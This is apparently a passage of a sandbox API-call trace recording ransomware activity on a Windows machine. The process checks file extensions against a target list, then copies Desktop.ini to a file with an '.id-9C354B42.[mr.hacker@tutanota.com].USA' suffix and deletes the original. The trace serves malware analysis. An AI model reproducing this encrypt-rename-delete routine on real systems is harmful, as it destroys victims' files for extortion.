[0041.976] lstrlenW (lpString=".doc") returned 4 [0041.976] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.976] lstrlenW (lpString=".docx") returned 5 [0041.976] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.976] lstrlenW (lpString=".pdf") returned 4 [0041.976] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.976] lstrlenW (lpString=".xls") returned 4 [0041.976] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.976] lstrlenW (lpString=".xlsx") returned 5 [0041.976] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.976] lstrlenW (lpString=".ppt") returned 4 [0041.976] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.977] lstrlenW (lpString=".zip") returned 4 [0041.977] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.977] lstrlenW (lpString=".rar") returned 4 [0041.977] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.977] lstrlenW (lpString=".bz2") returned 4 [0041.977] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.977] lstrlenW (lpString=".7z") returned 3 [0041.977] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.977] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.977] lstrlenW (lpString=".dbf") returned 4 [0041.977] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.977] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.977] lstrlenW (lpString=".1cd") returned 4 [0041.977] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.977] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.977] lstrlenW (lpString=".jpg") returned 4 [0041.977] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.977] lstrcmpiW (lpString1=".jpg", lpString2=".USA") returned -1 [0041.977] lstrlenW (lpString="Blue_Gradient.jpg") returned 17 [0041.977] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0042.714] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2575) returned 1 [0042.714] CloseHandle (hObject=0x200) returned 1 [0042.714] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg")) returned 0x20 [0042.714] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.714] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.714] lstrlenW (lpString=".doc") returned 4 [0042.714] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.714] lstrlenW (lpString=".docx") returned 5 [0042.714] lstrcmpiW (lpString1=".docx", lpString2="t.jpg") returned -1 [0042.714] lstrlenW (lpString=".pdf") returned 4 [0042.714] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.714] lstrlenW (lpString=".xls") returned 4 [0042.714] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.714] lstrlenW (lpString=".xlsx") returned 5 [0042.715] lstrcmpiW (lpString1=".xlsx", lpString2="t.jpg") returned -1 [0042.715] lstrlenW (lpString=".ppt") returned 4 [0042.715] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.715] lstrlenW (lpString=".zip") returned 4 [0042.715] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.715] lstrlenW (lpString=".rar") returned 4 [0042.715] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.715] lstrlenW (lpString=".bz2") returned 4 [0042.715] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.715] lstrlenW (lpString=".7z") returned 3 [0042.715] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.715] lstrlenW (lpString=".dbf") returned 4 [0042.715] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.715] lstrlenW (lpString=".1cd") returned 4 [0042.715] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.715] lstrlenW (lpString=".jpg") returned 4 [0042.715] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.715] lstrlenW (lpString=".doc") returned 4 [0042.715] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.715] lstrlenW (lpString=".docx") returned 5 [0042.715] lstrcmpiW (lpString1=".docx", lpString2="t.jpg") returned -1 [0042.715] lstrlenW (lpString=".pdf") returned 4 [0042.715] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.715] lstrlenW (lpString=".xls") returned 4 [0042.715] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.715] lstrlenW (lpString=".xlsx") returned 5 [0042.715] lstrcmpiW (lpString1=".xlsx", lpString2="t.jpg") returned -1 [0042.715] lstrlenW (lpString=".ppt") returned 4 [0042.716] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.716] lstrlenW (lpString=".zip") returned 4 [0042.716] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.716] lstrlenW (lpString=".rar") returned 4 [0042.716] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.716] lstrlenW (lpString=".bz2") returned 4 [0042.716] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.716] lstrlenW (lpString=".7z") returned 3 [0042.716] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.716] lstrlenW (lpString=".dbf") returned 4 [0042.716] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.716] lstrlenW (lpString=".1cd") returned 4 [0042.716] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.716] lstrlenW (lpString=".jpg") returned 4 [0042.716] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.716] lstrcmpiW (lpString1=".gif", lpString2=".USA") returned -1 [0042.716] lstrlenW (lpString="Connectivity.gif") returned 16 [0042.716] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0042.717] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2319) returned 1 [0042.717] CloseHandle (hObject=0x200) returned 1 [0042.717] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif")) returned 0x20 [0042.717] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.717] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.717] lstrlenW (lpString=".doc") returned 4 [0042.717] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0042.717] lstrlenW (lpString=".docx") returned 5 [0042.717] lstrcmpiW (lpString1=".docx", lpString2="y.gif") returned -1 [0042.717] lstrlenW (lpString=".pdf") returned 4 [0042.717] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0042.717] lstrlenW (lpString=".xls") returned 4 [0042.717] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0042.717] lstrlenW (lpString=".xlsx") returned 5 [0042.717] lstrcmpiW (lpString1=".xlsx", lpString2="y.gif") returned -1 [0042.717] lstrlenW (lpString=".ppt") returned 4 [0042.717] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0042.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.717] lstrlenW (lpString=".zip") returned 4 [0042.717] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0042.717] lstrlenW (lpString=".rar") returned 4 [0042.717] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0042.717] lstrlenW (lpString=".bz2") returned 4 [0042.718] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0042.718] lstrlenW (lpString=".7z") returned 3 [0042.718] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0042.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.718] lstrlenW (lpString=".dbf") returned 4 [0042.718] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0042.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.718] lstrlenW (lpString=".1cd") returned 4 [0042.718] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0042.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.718] lstrlenW (lpString=".jpg") returned 4 [0042.718] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0042.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.718] lstrlenW (lpString=".doc") returned 4 [0042.718] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0042.718] lstrlenW (lpString=".docx") returned 5 [0042.718] lstrcmpiW (lpString1=".docx", lpString2="y.gif") returned -1 [0042.718] lstrlenW (lpString=".pdf") returned 4 [0042.718] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0042.718] lstrlenW (lpString=".xls") returned 4 [0042.718] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0042.718] lstrlenW (lpString=".xlsx") returned 5 [0042.718] lstrcmpiW (lpString1=".xlsx", lpString2="y.gif") returned -1 [0042.718] lstrlenW (lpString=".ppt") returned 4 [0042.718] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0042.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.718] lstrlenW (lpString=".zip") returned 4 [0042.718] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0042.718] lstrlenW (lpString=".rar") returned 4 [0042.718] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0042.718] lstrlenW (lpString=".bz2") returned 4 [0042.718] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0042.718] lstrlenW (lpString=".7z") returned 3 [0042.719] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0042.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.719] lstrlenW (lpString=".dbf") returned 4 [0042.719] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0042.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.719] lstrlenW (lpString=".1cd") returned 4 [0042.719] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0042.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.719] lstrlenW (lpString=".jpg") returned 4 [0042.719] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0042.719] lstrcmpiW (lpString1=".ini", lpString2=".USA") returned -1 [0042.719] lstrlenW (lpString="Desktop.ini") returned 11 [0042.719] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0042.719] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=645) returned 1 [0042.719] CloseHandle (hObject=0x200) returned 1 [0042.719] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini")) returned 0x26 [0042.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.720] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0042.720] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0042.720] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0042.720] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.720] GetLastError () returned 0x0 [0042.720] ReadFile (in: hFile=0x200, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x285, lpOverlapped=0x0) returned 1 [0042.721] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x290, lpOverlapped=0x0) returned 1 [0042.722] ReadFile (in: hFile=0x200, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0042.722] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xea, lpOverlapped=0x0) returned 1 [0042.722] SetEndOfFile (hFile=0x208) returned 1 [0042.723] CloseHandle (hObject=0x208) returned 1 [0042.724] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0042.724] SetEndOfFile (hFile=0x200) returned 1 [0042.724] CloseHandle (hObject=0x200) returned 1 [0042.725] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x26) returned 1 [0042.725] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini")) returned 1 [0042.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.725] lstrlenW (lpString=".doc") returned 4 [0042.725] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0042.725] lstrlenW (lpString=".docx") returned 5 [0042.725] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0042.725] lstrlenW (lpString=".pdf") returned 4 [0042.725] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0042.725] lstrlenW (lpString=".xls") returned 4 [0042.725] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0042.725] lstrlenW (lpString=".xlsx") returned 5 [0042.725] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0042.725] lstrlenW (lpString=".ppt") returned 4 [0042.725] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0042.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.725] lstrlenW (lpString=".zip") returned 4 [0042.726] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0042.726] lstrlenW (lpString=".rar") returned 4 [0042.726] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0042.726] lstrlenW (lpString=".bz2") returned 4 [0042.726] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0042.726] lstrlenW (lpString=".7z") returned 3 [0042.726] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0042.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.726] lstrlenW (lpString=".dbf") returned 4 [0042.726] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0042.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.726] lstrlenW (lpString=".1cd") returned 4 [0042.726] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0042.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.726] lstrlenW (lpString=".jpg") returned 4 [0042.726] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0042.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.726] lstrlenW (lpString=".doc") returned 4 [0042.726] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0042.726] lstrlenW (lpString=".docx") returned 5 [0042.726] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0042.726] lstrlenW (lpString=".pdf") returned 4 [0042.726] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0042.726] lstrlenW (lpString=".xls") returned 4 [0042.726] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0042.726] lstrlenW (lpString=".xlsx") returned 5 [0042.726] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0042.726] lstrlenW (lpString=".ppt") returned 4 [0042.726] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0042.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.726] lstrlenW (lpString=".zip") returned 4 [0042.726] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0042.726] lstrlenW (lpString=".rar") returned 4 [0042.727] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0042.727] lstrlenW (lpString=".bz2") returned 4 [0042.727] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0042.727] lstrlenW (lpString=".7z") returned 3 [0042.727] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0042.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.727] lstrlenW (lpString=".dbf") returned 4 [0042.727] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0042.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.727] lstrlenW (lpString=".1cd") returned 4 [0042.727] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0042.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.727] lstrlenW (lpString=".jpg") returned 4 [0042.727] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0042.727] lstrcmpiW (lpString1=".emf", lpString2=".USA") returned -1 [0042.727] lstrlenW (lpString="Dotted_Lines.emf") returned 16 [0042.727] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0042.727] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=3792) returned 1 [0042.728] CloseHandle (hObject=0x200) returned 1 [0042.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf")) returned 0x20 [0042.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.728] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.728] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.728] lstrlenW (lpString=".doc") returned 4 [0042.728] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.728] lstrlenW (lpString=".docx") returned 5 [0042.728] lstrcmpiW (lpString1=".docx", lpString2="s.emf") returned -1 [0042.728] lstrlenW (lpString=".pdf") returned 4 [0042.728] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.728] lstrlenW (lpString=".xls") returned 4 [0042.728] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.728] lstrlenW (lpString=".xlsx") returned 5 [0042.728] lstrcmpiW (lpString1=".xlsx", lpString2="s.emf") returned -1 [0042.728] lstrlenW (lpString=".ppt") returned 4 [0042.728] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.728] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.728] lstrlenW (lpString=".zip") returned 4 [0042.728] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.728] lstrlenW (lpString=".rar") returned 4 [0042.728] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.728] lstrlenW (lpString=".bz2") returned 4 [0042.728] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.728] lstrlenW (lpString=".7z") returned 3 [0042.728] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.728] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.729] lstrlenW (lpString=".dbf") returned 4 [0042.729] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.729] lstrlenW (lpString=".1cd") returned 4 [0042.729] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.729] lstrlenW (lpString=".jpg") returned 4 [0042.729] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.729] lstrlenW (lpString=".doc") returned 4 [0042.729] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.729] lstrlenW (lpString=".docx") returned 5 [0042.729] lstrcmpiW (lpString1=".docx", lpString2="s.emf") returned -1 [0042.729] lstrlenW (lpString=".pdf") returned 4 [0042.729] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.729] lstrlenW 